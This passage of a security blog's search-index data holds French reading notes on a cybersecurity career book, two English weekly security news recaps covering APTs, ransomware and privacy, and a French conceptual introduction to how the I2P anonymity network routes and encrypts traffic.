employé, vous pourriez essayer de vous connecter avec les personnes en charge de la sécurité dans votre entreprise et essayer de leur donner un coup de main dans la mesure de vos moyens quand c\u0026rsquo;est possible Si vous êtes étudiant, un stage est un excellent moyen d\u0026rsquo;acquérir de l\u0026rsquo;expérience, car il serait généralement bien plus facile d\u0026rsquo;en obtenir un qu\u0026rsquo;un emploi Réseautage et recherche d\u0026rsquo;emploi # Si vous avez tout lu jusqu\u0026rsquo;ici, vous avez maintenant une meilleure idée de ce à quoi ressemble l\u0026rsquo;industrie, et comment obtenir des certifications et des compétences pour décrocher un emploi. Cette sous-partie aide avec cette dernière chose.\nLe premier chapitre de cette sous-partie vise à vous donner des outils pour construire votre image de marque. Pour y parvenir, vous aurez besoin d\u0026rsquo;un objectif et de constance. Les auteurs suggèrent quelques moyens de définir votre objectif (par exemple, vous demander ce que vous voulez faire, comment vous voulez être perçu, si vous aviez le choix, que voudriez-vous faire, qu\u0026rsquo;est-ce qui vous en empêche, et comment y remédier, \u0026hellip;) Connaître votre objectif aidera à définir votre marque. Quelques points supplémentaires que les auteurs soulèvent sont :\nPassez du temps à écrire des publications de qualité sur les réseaux sociaux Publier régulièrement sur les réseaux sociaux Connaître les caractéristiques des réseaux sociaux que vous utilisez (par exemple, Twitter n\u0026rsquo;a pas la même ambiance que LinkedIn) Vous pouvez partager des articles si vous ne vous sentez pas à l\u0026rsquo;aise pour partager vos propres réflexions. Si vous le faites, ajouter un bref résumé ou une question d\u0026rsquo;engagement est bien En général, les auteurs donnent beaucoup de conseils liés à l\u0026rsquo;utilisation des réseaux sociaux, sans que ce soit spécifiquement lié à la sécurité informatique.\nCette sous-partie se termine par comment postuler à des postes, faire un bon CV, décrocher des entretiens et bien s\u0026rsquo;y comporter. Encore une fois, la plupart des points des auteurs ne sont pas spécifiquement liés à l\u0026rsquo;infosec. Quelques éléments que nous pouvons noter :\nDéterminez la cause profonde de votre changement de carrière pour prendre les décisions appropriées Utilisez des services de recherche d\u0026rsquo;emploi tels que LinkedIn, Glassdoor, Indeed, \u0026hellip; pour trouver des postes intéressants, mais aussi pour obtenir des renseignements sur le marché (quels types d\u0026rsquo;emplois sont largement disponibles, comment est la rémunération, \u0026hellip;) Recherchez des personnes avec un parcours similaire au vôtre, et essayez de voir comment elles sont entrées dans l\u0026rsquo;infosec, et à quoi ressemble leur parcours professionnel Des ressources telles que resumeworded.com, skillsyncer.com peuvent être utilisées pour voir si votre CV contient les bons mots-clés pour être attractif Section 3 : Vous êtes dedans ; il est temps de passer au niveau supérieur ! # Cette section donne principalement des conseils pour vous aider à aller plus loin dans votre carrière une fois que vous avez réussi à entrer dans l\u0026rsquo;industrie.\nLes auteurs encouragent les lecteurs à intervenir lors de conférences et donnent des conseils sur comment postuler, quelles conférences pourraient être bien, et comment découvrir des sujets sur lesquels parler. Ils soulignent aussi que le burnout est un risque dans l\u0026rsquo;industrie, et proposent des moyens pour essayer de l\u0026rsquo;éviter, ainsi que les indicateurs d\u0026rsquo;un environnement de travail toxique (par exemple, les ragots, le jeu des reproches, un leadership toxique, un taux de turnover élevé).\nPour conclure le livre, quelques derniers conseils qu\u0026rsquo;il offre sont :\nComprendre et définir des objectifs SMART (Spécifiques, Mesurables, Atteignables, Pertinents, Temporellement définis) Être responsable et fournir le travail nécessaire Essayer de trouver un mentor et entretenir cette relation S\u0026rsquo;engager avec les gens en ligne à travers divers moyens tels que LinkedIn, les serveurs Discord, Twitter, \u0026hellip;. Se rappeler ceci lors de la construction d\u0026rsquo;un réseau social Trouver un terrain commun quand on contacte de nouvelles personnes sans introduction (par exemple, vous travaillez dans le même domaine) C\u0026rsquo;est à propos d\u0026rsquo;eux, pas de vous : éliminez le contexte d\u0026rsquo;une relation parasitaire Créer de la profondeur, pas de la largeur : consacrez du temps et de la régularité à votre réseau. Ce n\u0026rsquo;est pas une question de publications/Snapchats quotidiens, mais d\u0026rsquo;emails personnalisés, de messages, \u0026hellip; La régularité est la clé Être malin dans le réseautage : construire un réseau prend du temps. Une bonne approche est de trouver un moyen de faire plusieurs choses en même temps quand on appelle quelqu\u0026rsquo;un, par exemple pendant les trajets Faire un suivi après la première rencontre avec quelqu\u0026rsquo;un Mon opinion sur le livre # Je pense que les auteurs font beaucoup de bons points utiles dans les différents chapitres. Quelques choses sur lesquelles j\u0026rsquo;étais un peu réservé :\nVous pourriez vouloir vous demander si tous les conseils sont bons pour vous. Par exemple, à un moment, il est suggéré de taguer des gens dans les commentaires de vos publications LinkedIn pour obtenir de l\u0026rsquo;engagement. Cela m\u0026rsquo;agacerait personnellement d\u0026rsquo;être tagué sans bonne raison, mais chacun ses goûts Dans certaines parties, j\u0026rsquo;ai eu l\u0026rsquo;impression qu\u0026rsquo;un lien vers de la documentation en ligne serait mieux. Spécifiquement, la partie sur comment installer et utiliser WebGoat (aussi, je recommanderais personnellement plutôt quelque chose comme Hack the Box) C\u0026rsquo;est peut-être dû au fait que le livre a plusieurs auteurs, mais il y a plusieurs endroits où ils font les mêmes remarques, et parfois les transitions sont un peu confuses Cela dit, je recommanderais totalement de lire le livre si vous êtes dans l\u0026rsquo;une des situations suivantes, car il y a beaucoup de bons conseils et connaissances exploitables dont vous pourriez bénéficier :\nVous êtes étudiant, ou vous venez de commencer votre carrière (si vous étudiez la sécurité, les parties où les concepts CIA et autres sont définis pourraient être quelque chose que vous voudriez ignorer) Vous êtes un professionnel en milieu de carrière sans expérience en sécurité qui souhaite entrer dans l\u0026rsquo;industrie de la sécurité. Dans ce cas, la première moitié du livre serait utile pour vous familiariser avec la sécurité et comment acquérir de l\u0026rsquo;expérience. La deuxième moitié peut-être un peu moins, sauf pour la partie sur l\u0026rsquo;image de marque personnelle ","date":"2021-10-28","externalUrl":null,"permalink":"/fr/posts/2021/reading-notes-cybersecurity-career-master-plan-proven-techniques-and-effective-tips-to-help-you-advance-in-your-cybersecurity-career/","section":"Articles","summary":"Mes notes de lecture sur ‘Cybersecurity Career Master Plan : Techniques et conseils pour avancer dans votre carrière en cybersécurité’","title":"Notes de lecture : Cybersecurity Career Master Plan : Techniques et conseils pour avancer dans votre carrière en cybersécurité","type":"posts"},{"content":"As always, plenty of things happened this week, but no worries if you had no time to go through all the news. Our weekly news recap will keep you up to date on APTs, Cryptocurrencies, Darknet, General Security, Privacy and Ransomware news.\nAdditionally, you might have heard of I2P, a network similar to Tor. It has some interesting characteristics but the official documentation is a bit hard to get through. This week, I wrote an article offering a simple introduction to how it works.\nAPT # Twitter suspends two accounts used by DPRK hackers to catfish security researchers (The Record)\nEarlier this year, Google identified a campaign carried out by North Korea where hackers would create accounts claiming to be security researchers, and try to redirect actual security researchers to malicious websites to try and infect their computer with malware. On October 15th, Twitter suspended two accounts that were involved in this scheme.\nRussian cybercrime gang targets finance firms with stealthy macros (Bleeping Computer)\nResearchers discovered a new phishing campaign named MirrorBlast. It takes advantage of malicious Excel macros which are not detected by VirusTotal, but only impacts the 32-bit version of Office. If an attack succeeds, a malicious MSI package is downloaded and installed. It then contacts a C2 command to retrieve further instruction, whose effects are unknown as of now. The culprit appears to be TA505, a Russia related group.\nChinese tech minister says he\u0026rsquo;s \u0026lsquo;dealt with\u0026rsquo; 73,000 sites that breached the law (The Register)\nChina\u0026rsquo;s Minister of Industry and Information technology announced that China investigated 1.83 million apps to make sure they \u0026ldquo;don\u0026rsquo;t infringe users\u0026rsquo; rights and interests\u0026rdquo; and required \u0026ldquo;rectification\u0026rdquo; from 4,200 of them since 2020. In addition, 73,000 websites were \u0026ldquo;investigated and dealt with in accordance with the law\u0026rdquo;.\nState-backed hackers breach telcos with custom malware (Bleeping Computer)\nSymantec discovered a new APT targeting IT, telecoms, and government entities in South Asia, and named it Harvester. The group uses new malware and is believed to be active since June 2021.\nCryptocurrencies # France tests crypto assets in series of government bond deals (Financial Times)\nA group made of some of France\u0026rsquo;s biggest financial market participants used a digital currency issued by the Banque de France as part of a 10-month test in the country\u0026rsquo;s debt market to test the usefulness of a central bank currency. A deputy chief executive at Euroclear concluded that \u0026ldquo;[they] have together successfully been able to measure the inherent benefits of this technology, concluding that the central bank digital currencies can settle central bank money safely and securely.”\nDarknet # Two Individuals Sentenced for Providing “Bulletproof Hosting” for Cybercriminals (US Department of Justice)\nTwo Eastern European men were sentenced to 24 and 48 months of prison by a Michigan court for providing \u0026ldquo;bulletproof hosting\u0026rdquo; used to disseminate malware (including Zeus, and SpyEye) used to attack US companies and financial institutions between 2009 and 2015.\nGeneral Security # Windows 10, iOS 15, Ubuntu, Chrome fall at China\u0026rsquo;s Tianfu hacking contest (The Record)\nThe fourth edition of the Tianfu hacking contest took place this month and was featuring 16 targets (including Chrome, Safari, Docker, VMware, Domestic Vehicles, \u0026hellip;) that researchers could target to find vulnerabilities. 11 of these targets ended up with found vulnerabilities.\nNot just deprecated, but deleted: Google finally strips File Transfer Protocol code from Chrome browser (The Register)\nThe Chromium team removed the support for FTP from Chrome. The change will take effect from the version 95.\nHacker steals government ID database for Argentina\u0026rsquo;s entire population (The Record)\nA hacker has broken into the Argentinian\u0026rsquo;s National Registry of Persons (RENAPER) and published ID card photos and personal details of 44 Argentinan celebrities. The Ministry of Interior claims that “the [RENAPER] database did not suffer any data breach or leak,” but that the hacker only queried the database for 19 photos. The hacker however claims that he has a copy of the database, and might publish the data of 1 or 2 million people soon.\nU.S. Government Bans Sale of Hacking Tools to Authoritarian Regimes (The Hacker News)\nThe US Department of Commerce announced new rules that will take effect in 90 days, and establish new controls on \u0026ldquo;cybersecurity items\u0026rdquo; (e.g. surveillance tools) exports by requiring a license. An exception would allow exporting to most countries \u0026ldquo;while retaining a license requirement for exports to countries of national security or weapons of mass destruction concern. In addition, countries subject to a U.S. arms embargo will require a license.\u0026rdquo;\nGoogle unmasks two-year-old phishing \u0026amp; malware campaign targeting YouTube users (The Record)\nThe Google Threat Analysis Group attributed a two years campaign aiming to take control of YouTube accounts to a group of hackers recruited in a Russian-speaking forum. The hackers would reach to victims via email with business opportunities, ask them to install and test applications, and would them hijack authentication cookies from their browser to access and steal their YouTube accounts. More than 4,000 accounts were reportedly impacted.\nPrivacy # Doctor is set for possible £100,000 pay-out after judge\u0026rsquo;s landmark ruling that her neighbour\u0026rsquo;s Ring doorbell cameras breached her privacy (Daily Mail)\nA resident of Oxfordshire might be eligible to be compensated with more GBP 100,000 after claiming that one of her neighbours was invaliding her privacy by having security cameras recording (including audio) her gate, garden and car parking spaces.\nWhat\u0026rsquo;s Brave Done For My Privacy Lately? Episode #11: Debouncing (Brave Blog)\nBouncing consists of a website using third parties to redirect you somewhere. For example, a website could - in order to track you - have a link to traker.com/?site=example.com to redirect you to example.com instead of a link to example.com directly. Brave Browser implemented protection against this in its version 1.32, where it is getting rid of the intermediary.\nJapanese messaging giant Line admits it mishandled user data, promises to do better (The Register)\nLine, a very popular messaging and payment application in Asia where it has more than 700 million users admitted that it had suffered multiple shortcomings and put users\u0026rsquo; personal information at risk. Earlier this year, it was revealed that some users\u0026rsquo; data was processed in China (potentially putting it at risk) and/or stored in South Korea, while the company promised its users that all the data was stored in Japan.\n7-Eleven breached customer privacy by collecting facial imagery without consent (ZDNet)\nAustralia\u0026rsquo;s information commissioner found out that 7-Eleven has been collecting without notice the facial images of customers between June 2020 and August 2021 as part of a survey program. 7-Eleven has been ordered to destroy all the collected faceprints and to stop their collection.\nPrivacy-preserving Brave Search Replaces Google as the Default Search Engine in the Brave Browser (Brave Blog)\nBrave announced it would start to use Brave search as a default to help giving users \u0026ldquo;the privacy and independence of a search/browser alternative to big tech.\u0026rdquo; It replaces Google in the US, UK, and Canada, Qwant in France, and DuckDuckGo in Germany.\nRansomware # US links $5.2 billion worth of Bitcoin transactions to ransomware (Bleeping Computer)\nThe U.S. Treasury Department\u0026rsquo;s Financial Crimes Enforcement Network (FinCEN) calculated that the top 10 more common ransomware variants received about USD 5.2 billion in Bitcoin between July 2018 and Now.\nREvil Disappears Again: \u0026lsquo;Something Is Rotten in the State of Ransomware\u0026rsquo; (Flashpoint Intel)\nOn October 17th a REvil operator announced on the XSS hacking forum that the group was shutting down. This happens after someone used their Tor hidden service\u0026rsquo;s private key to hijack their website (see this article if you need a reminder about Tor hidden services.)\nFree BlackByte decryptor released, after researchers say they found flaw in ransomware code (Grahan Cluley)\nResearchers at Trustwave released a free decryption tool for BlackByte ransomware taking advantage of an odd encryption design where the malware would use the same AES key to encrypt the files, rather than having a unique key in each session.\nEvil Corp demands $40 million in new Macaw ransomware attacks (Bleeping Computer)\nEvil Corp started using a new ransomware named Macaw Locker in order to try to bypass sanctions that were decided against the group in 2019 and prevent victims from paying. Olympus and Sinclair Broadcast Group were reportedly hit by this new ransomware that demanded USD 28 and 40 Million.\nInteresting Reads # Ransomware Trends in Bank Secrecy Act Data Between January and June 2021 (FinCEN) BlackMatter Ransomware Advisory (Cybersecurity \u0026amp; Infrastructure Security Agency) Operation Secondary Infektion Targets Pfizer Vaccine (Recorded Future) Russian-speaking cybercrime evolution: What changed from 2016 to 2021 (SecureList by Kaspersky) ","date":"2021-10-22","externalUrl":null,"permalink":"/blog/weekly-news-recap-11/","section":"News","summary":"As always, plenty of things happened this week, but no worries if you had no time to go through all the news. Our weekly news recap will keep you up to date on APTs, Cryptocurrencies, Darknet, General Security, Privacy and Ransomware news.\n","title":"Weekly News Recap 11","type":"news"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nL\u0026rsquo;Invisible Internet Project (I2P) est une couche réseau privée et chiffrée qui permet aux gens de se connecter anonymement. Contrairement à Tor (si vous n\u0026rsquo;êtes pas familier avec lui, je vous recommande de consulter cet article), I2P n\u0026rsquo;est pas conçu pour accéder à Internet (bien qu\u0026rsquo;il soit possible de le faire avec des outproxies) mais pour accéder à divers types de services au sein du réseau, tels que des sites web anonymes (site I2P, ou eepSite), des torrents, des IRC, \u0026hellip; I2P a été publié en 2003 et en est maintenant à la version 1.5.\nCertaines parties de l\u0026rsquo;implémentation d\u0026rsquo;I2P sont un peu similaires à Tor (le concept de chiffrement en oignon), mais il possède aussi des caractéristiques supplémentaires (principalement le routage et le chiffrement en ail). La documentation officielle est un peu difficile à appréhender, donc cet article vise à vous donner une bonne vue d\u0026rsquo;ensemble du fonctionnement de toutes les parties du système.\nComment fonctionne I2P # Vue d\u0026rsquo;ensemble de haut niveau et tunnels # Le premier terme que nous devons connaître est « routeur ». Fondamentalement, il désigne tout client qui exécute I2P. Chaque routeur possède des tunnels entrants et sortants qui sont des conduits de données permettant de recevoir et d\u0026rsquo;envoyer des données. Les données entrantes et sortantes sont séparées pour permettre une meilleure anonymité et de meilleures performances.\nLa Figure 1 suivante montre comment les échanges sont effectués entre différents utilisateurs. Notez qu\u0026rsquo;il s\u0026rsquo;agit d\u0026rsquo;une version simplifiée avec certains tunnels omis.\nFigure 1 : Routage I2P entre routeurs (source geti2p.net) Nous pouvons voir qu\u0026rsquo;Alice et Bob communiquent ensemble. Les données envoyées à Bob passent par les tunnels sortants d\u0026rsquo;Alice puis vers les tunnels entrants de Charlie, tandis que les données reçues de Bob passent par les tunnels sortants de Bob puis les tunnels entrants d\u0026rsquo;Alice.\nUne plongée plus profonde dans les tunnels et le chiffrement # Après avoir lu la partie précédente, nous avons une vue d\u0026rsquo;ensemble de haut niveau du fonctionnement du système, mais cela ne répond pas à la question de comment les données des clients restent secrètes. Cette partie est là pour y répondre.\nLa partie principale de la réponse réside dans les tunnels. De manière similaire à Tor, deux clients communiquant ensemble sont séparés par plusieurs routeurs (sauts). Habituellement 2 ou 3 (comme dans la Figure 2), mais cela pourrait être configuré jusqu\u0026rsquo;à 7, ou aussi peu que 0.\nFigure 2 : Échanges entre tunnels I2P (source geti2p.net) La Figure 2 montre ce qui se passerait si Alice envoyait un message à Bob. Avant d\u0026rsquo;expliquer les interactions, nous avons besoin de quelques définitions :\na est la passerelle sortante. Techniquement, c\u0026rsquo;est le routeur d\u0026rsquo;Alice b et c sont les participants du tunnel sortant. Il peut y en avoir un ou plusieurs, et ils sont juste là pour transférer le message au nœud suivant d est le point de sortie du tunnel sortant. C\u0026rsquo;est la fin du tunnel sortant (appartenant à Alice), et il est chargé de transmettre le message au tunnel entrant (appartenant à Bob) e est la passerelle entrante. Si un client veut que des personnes puissent le contacter, l\u0026rsquo;adresse de la passerelle entrante sera publiée dans la base de données du réseau (plus de détails à ce sujet plus tard) f et g sont les participants du tunnel entrant. Ils sont identiques à b et c. Les participants des tunnels ne savent jamais s\u0026rsquo;ils font partie d\u0026rsquo;un tunnel entrant ou sortant, et sont simplement chargés de recevoir des messages et de les envoyer au saut suivant h est le point de terminaison entrant. Techniquement, le routeur de Bob Lors de l\u0026rsquo;envoi d\u0026rsquo;un message, voici ce qui se passera au niveau du chiffrement :\na va fragmenter le message en messages plus petits de 1 024 octets. Tous les messages passant dans le pipeline ont une taille fixe pour prévenir diverses attaques a va chiffrer chaque message de 1 024 octets pour h, de sorte que seuls Alice et Bob puissent en connaître le contenu a va chiffrer le résultat obtenu en (1) pour d, puis il va chiffrer le résultat pour c, puis il va chiffrer le résultat pour b (et faire cela autant de fois qu\u0026rsquo;il y a de participants). C\u0026rsquo;est similaire à ce qui est fait dans Tor avec le chiffrement en oignon b va recevoir les messages du tunnel, les déchiffrer, et les transférer à c c va recevoir les messages du tunnel, les déchiffrer, et les transférer à d d va recevoir les messages de 1 024 octets, les réassembler pour récupérer les données initiales qui ont été fragmentées à l\u0026rsquo;étape (1), et transmettre cela à la passerelle entrante e e va recevoir le message, le fragmenter en messages tunnel de 1 024 octets, et envoyer chacun d\u0026rsquo;eux à f f va recevoir les messages du tunnel, les chiffrer, et les transférer à g g va recevoir les messages du tunnel, les chiffrer, et les transférer à h h va déchiffrer les messages chiffrés par g, déchiffrer le résultat chiffré par f, déchiffrer le résultat chiffré par e, et déchiffrer le résultat chiffré par a. Puis il assemble le tout pour récupérer le grand message en clair que nous avions à l\u0026rsquo;étape (1) Notez que a utilisera la fonction decrypt pour chiffrer les messages, et b et c la fonction encrypt pour les déchiffrer. Puisque f et g utilisent aussi la fonction encrypt (pour chiffrer les messages cette fois), les participants ne peuvent pas savoir s\u0026rsquo;ils font partie d\u0026rsquo;un tunnel entrant ou sortant. De plus, pour s\u0026rsquo;assurer que les messages du tunnel font toujours 1 024 octets, les différents processus peuvent utiliser du rembourrage.\nÉtablissement des tunnels et base de données # Si vous êtes arrivé jusqu\u0026rsquo;ici, vous avez maintenant une idée générale du fonctionnement d\u0026rsquo;I2P, de comment les données restent confidentielles, et de ce que font les tunnels. Deux choses que vous ne savez pas encore sont comment les tunnels sont créés, et comment les clients sont anonymes (si vous êtes familier avec Tor, vous avez peut-être déjà compris la deuxième partie de la question).\nLa base de données # Un élément critique dans le système est la capacité de contacter d\u0026rsquo;autres routeurs pour créer les routes, mais aussi de savoir comment accéder aux services. Tor a un point central où les clients peuvent se renseigner sur les informations des nœuds. I2P a aussi un point central pour obtenir les informations des routeurs, mais ce n\u0026rsquo;est pas une base de données exhaustive. Elle sera simplement utilisée pour fournir quelques adresses de routeurs, afin que le client puisse amorcer la carte du réseau. La base de données des routeurs elle-même est une base de données distribuée nommée netDb. La netDb est distribuée avec une technique appelée « floodfill », et chaque routeur y participant est appelé un « routeur floodfill ». La base de données contient deux entités : les RouterInfos et les LeaseSets.\nChaque routeur participant au réseau a une entrée dans la base de données nommée RouterInfo. Elle contient les éléments suivants :\nL\u0026rsquo;identité du routeur (une clé de chiffrement, une clé de signature et un certificat) L\u0026rsquo;adresse de contact pour joindre le routeur La date de publication Diverses options textuelles pour partager les capacités du routeur et autres Une signature de tous les champs précédents, créée par le routeur avec la clé de signature Pour pouvoir envoyer un message à un client, chacun de ses tunnels entrants possède un LeaseSet dans la base de données. Il fournira les informations suivantes :\nLe routeur passerelle du tunnel (qui est défini dans les entités RouterInfo) L\u0026rsquo;identifiant du tunnel (nombre de 4 octets) La date d\u0026rsquo;expiration du tunnel (par défaut toutes les 10 minutes) Une clé de chiffrement, une clé de signature et un certificat pour la destination Une signature des données du LeaseSet Notez qu\u0026rsquo;il est possible pour un LeaseSet de ne pas être public (par exemple quand un client utilise IRC), et de simplement faire en sorte qu\u0026rsquo;I2P partage les informations du LeaseSet avec les parties concernées.\nUn type de LeaseSets est particulièrement intéressant pour nous : les LeaseSets chiffrés. Comme leur nom l\u0026rsquo;indique, ils ne permettent qu\u0026rsquo;aux clients possédant la bonne clé d\u0026rsquo;obtenir les informations du LeaseSet, et donc de pouvoir contacter le tunnel entrant. Notez que lorsqu\u0026rsquo;un routeur enregistre un LeaseSet dans la base de données, il le fera en utilisant son tunnel sortant pour pouvoir rester anonyme.\nÉtablissement des tunnels # Lorsqu\u0026rsquo;un routeur veut créer un tunnel, il trouvera des routeurs à partir des entrées RouteInfo de la base de données, et les sélectionnera pour avoir une route optimisée à l\u0026rsquo;aide de diverses heuristiques. Il devra ensuite contacter les routeurs pour leur demander la permission de configurer un tunnel.\nChacun des membres potentiels du tunnel recevra un identifiant de tunnel et des clés de chiffrement qu\u0026rsquo;il devra utiliser pour chiffrer les données transitant, et aussi pour répondre à la demande de construction. De plus :\nles participants intermédiaires du tunnel et la passerelle entrante recevront les informations du prochain saut (adresse du routeur et identifiant du tunnel) le point de sortie du tunnel sortant recevra les informations de la passerelle entrante à laquelle nous voulons envoyer des informations Lorsque tous les participants ont accepté de faire partie d\u0026rsquo;un tunnel, le routeur initiateur peut commencer à l\u0026rsquo;utiliser pour envoyer ou recevoir des données. Les participants peuvent avoir plusieurs tunnels ouverts, donc l\u0026rsquo;identifiant de tunnel qui leur est fourni au début leur permet de savoir à quel tunnel appartient un paquet qu\u0026rsquo;ils reçoivent, et donc quel est le prochain saut pour ce message. Puisque les routeurs ne peuvent voir que la destination précédente et suivante d\u0026rsquo;un message, ils ne peuvent pas savoir qui envoie le message ni où il va, permettant ainsi l\u0026rsquo;anonymat.\nSources et lectures complémentaires # https://geti2p.net/en/docs/how/intro https://geti2p.net/en/docs/how/tunnel-routing https://geti2p.net/spec/tunnel-creation https://geti2p.net/en/docs/tunnels/implementation https://geti2p.net/en/comparison/tor https://geti2p.net/en/docs/how/garlic-routing https://geti2p.net/en/docs/how/network-database Effects of Shared Bandwidth on Anonymity of the I2P Network Users https://geti2p.net/ja/docs/how/tech-intro Privacy-Implications of Performance-Based Peer Selection by Onion-Routers: A Real-World Case Study using I2P https://geti2p.net/en/docs/how/threat-model https://geti2p.net/en/blog/post/2021/09/07/Level-Up-Encrypted-Leasesets ","date":"2021-10-21","externalUrl":null,"permalink":"/fr/posts/2021/i2p-a-simple-introduction/","section":"Articles","summary":"I2P est une couche réseau privée et chiffrée qui permet aux gens de se connecter anonymement. Voyons comment cela fonctionne et en quoi c’est différent de Tor","title":"I2P - Une introduction simple","type":"posts"},{"content":"As always, plenty of things happened this week, but no worries if you had no time to go through all the news. Our weekly news recap will keep you up to date on APTs, Cryptocurrencies, Darknet, General Security, Privacy and Ransomware news.\nAdditionally, if you own any digital currencies, you might be interested in our new weekly article suggesting various ways to keep your funds safe.\nAPT # Microsoft: Iran-linked hackers breached Office 365 customer accounts (The Record)\nMicrosoft announced that 250 Office 365 customers were the target of a new Iran-related hacking group who managed to compromise 20 accounts using password spraying. Microsoft named this group DeV-0343 and assessed that the attack was still ongoing.\nCryptocurrencies # Bank of America insider charged with money laundering for BEC scams (Bleeping Computer)\nA US court charged three men with money laundering and aggravated identity theft through business email compromise. The suspects are believed to have stolen USD 1.1 million from at least five victims. One of the alleged perpetrators was employed by Bank of America and was opening bank accounts for his co-conspirators and falsifying bank entries.\nOpenSea NFT platform bugs let hackers steal crypto wallets (Bleeping Computer)\nOpenSea, one of the largest marketplaces for trading non-fungible tokens was found to have a flaw allowing an attacker to steal all the balance of account owners by having them click on a malicious NFT art. The attack can then be carried on through SVG images including malicious JavaScript code.\nDarknet # White House Market Completed its Shut-Down\nOn October 1st, Mr White, the White House Market administrator announced that the market would close down. This is now done after the market came offline on October 14th.\nV2 Onion Services to be Totally Depreciated From Today\nAccording to the v2 services depreciation timeline provided by the Tor Project, the first version of the Tor client not supporting v2 services is set to be released today. Such services stopped being supported on the server-side starting the version 0.4.6 released on July 2021.\nGeneral Security # Apple quietly patches yet another iPhone 0-day - check you have 15.0.2 (Naked Security)\nApple released (again) an update for iPad and iPhone devices to address 0-day vulnerabilities. One of them was a Kernel memory corruption allowing the execution of arbitrary code with kernel privileges.\nHacker arrested in France for theft of COVID-19 tests for 1.4 million Parisians (The Record)\nThe French police arrested a man suspected of breaching a Hospital\u0026rsquo;s system in Paris on September 12th and leaking covid-19 test results of more than 1.4 million patients. He shared links to the leaked information through his Twitter profile and a forum (which might be why he was caught this fast).\nBusiness as usual for Azure customers despite 2.4 Tbps DDoS attack (Microsoft Azure)\nMicrosoft announced that they mitigated a DDoS attack of 2.4 TB/sec at the end of August. This attack that targeted Microsoft Azure was 140% stronger than the highest DDoS Microsoft experienced in 2020, and came from about 70,000 sources, mostly in the Asia-Pacific region.\nDutch police send warning letters to DDoS booter customers (Bleeping Computer)\nEarlier last month, 29 Dutch nationals that were customers of minesearch.zip, a DDoS as a Service, received a warning from the Dutch police stating that their activity had been registered and that further mischiefs would lead them to be prosecuted.\nOVH hosting provider goes down during planned maintenance (Bleeping Computer)\nThe French hosting provider OVH, one of the largest in Europe, suffered an outage due to a human error during the planned maintenance of routers aimed at improving OVH\u0026rsquo;s resilience against DDoS attacks. This is not the first big problem for the company this year, as they suffered a major fire at one of their data centres in March. The company is due to IPO on Euronext Paris on October 15th.\nApple says Android has up to 47x more malware than iPhone in continued pushback against sideloading (9to5Mac)\nFollowing a legislation proposal in Europe and the US that would force Apple to allow sideloading applications on iOS, the company published a 31 pages security report arguing that it believes this is a harmful idea.\nGoogle gives away 10,000 free security keys to high-risk users (BitDefender Blog)\nFollowing last week\u0026rsquo;s announcement that 14,000 Gmail users were targeted by the Russian APT Fancy Bear (APT28), Google decided to give away 10,000 Titan security keys to high-risk users.\nGoogle sent 50,000 warnings of state-sponsored attacks in 2021 (Bleeping Computer)\nGoogle announced that it sent about 50,000 alerts related to state-sponsored phishing this year. A nearly 33% increase compared to 2020. The company claimed to be tracking more than 270 state-sponsored hacking groups in more than 50 countries.\nMissouri Refers Responsible Bug Report to Prosecutors (Info Risk Today)\nA newspaper employee discovered that a government website used to verify teachers certifications was exposing 100,000 social security numbers in the HTML source code. Governor Mike Parson (ridiculously) announced that he considers this to be a hack and will seek prosecution while claiming that the incident could cost Missouri taxpayers as much as USD 50 Million.\nWhatsApp\u0026rsquo;s got your back(ups) with encryption for stored messages (The Register)\nWhatsApp began rolling out a feature allowing messages backups to be stored end-to-end encrypted into iCloud and Google Drive. The messages were previously stored unencrypted.\nThe King is Dead, Long Live MyKings! (Avast)\nA new report published by Avast found out that MyKing, a botnet active since at least 2016 appears to have stolen more than USD 24 million in Bitcoin, Ethereum, and Dogecoin, thanks to a clipboard stealer module.\nPrivacy # EU legislation introduced to ban anonymous domain registration (Bleeping Computer)\nThe European Union is drafting legislation stating that \u0026ldquo;registrants of new domains will be required to provide a valid telephone number belonging to them, while their full name, email, and physical address will have to be verified too.\u0026rdquo;\nFirefox Suggest to display sponsored ads but users can disable them (HackRead)\nFirefox introduced a feature named \u0026ldquo;Firefox Suggest\u0026rdquo; in Firefox 93. It will display suggestions from trusted partners (which allegedly meet Mozilla\u0026rsquo;s standard of privacy) when a user types things into the search bar. It can be disabled in the settings.\nStudy reveals Android phones constantly snoop on their users (Bleeping Computer)\nA study conducted by researchers at the Univesity of Edinburg, in the UK, concluded that \u0026ldquo;Vendor-customized Android variants transmit substantial amounts of information to the OS developer and also to third parties (Google, Microsoft, Linked In, Facebook, etc.) that have pre-installed system apps.\u0026rdquo; What is even more worrying is that there is no possibility to turn this tracking off.\nBelarus: Joining banned Telegram channels will land you in prison (Bleeping Computer)\nBelarus law enforcement published a list of over 100 Telegram channels that they consider to be extremism, and that the simple fact of joining them could land you in prison for up to seven years.\nRansomware # New Australian ransomware plan could freeze or seize cryptocurrencies (The Record)\nThe Australian government is building a new strategy to fight against ransomware and is considering various measures such as changing the law to allow law enforcement to track and freeze ransomware gains, require ransomware incidents to be reported, new criminal status, and joining international efforts. The full plan is available here.\nOngoing Cyber Threats to U.S. Water and Wastewater Systems (Cybersecurity \u0026amp; Infrastructure Security Agency)\nThe FBI, CISA, EPA, and NSA released a joint advisory regarding the threats to the US water systems. In this report, we can learn that three facilities have been infected by ransomware this year: in Nevada (March), Maine (July), and California (August).\nCyber assurance : le parlement Français prévoit de sanctionner les entreprises qui payent leurs rançons (Under News - in French)\nA French parliamentary report suggests forbidding insurers to cover ransomware ransom payments, arguing that paying ransom only encourages criminals and does not provide any guarantee that the data will be recovered.\nU.S. convenes 30 countries on ransomware threat — without Russia or China (The Record)\nThe US gathered 30 countries on the 13 and 14 of October to discuss global efforts to fight cybercrime by various means such as strengthen law enforcement cooperation. Russia and China weren\u0026rsquo;t invited this time, but Russia might have the opportunity to participate later, if further sessions are held.\nInteresting Reads # Roundup of Ransomware in the CIS Android Mobile OS Snooping By Samsung, Xiaomi, Huawei and Realme Handsets Cybercriminals Abuse Donation Sites for Card Testing Inside Apple: How macOS attacks are evolving Bugs in our Pockets: The Risks of Client-Side Scanning ","date":"2021-10-15","externalUrl":null,"permalink":"/blog/weekly-news-recap-10/","section":"News","summary":"As always, plenty of things happened this week, but no worries if you had no time to go through all the news. Our weekly news recap will keep you up to date on APTs, Cryptocurrencies, Darknet, General Security, Privacy and Ransomware news.\n","title":"Weekly News Recap 10","type":"news"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision 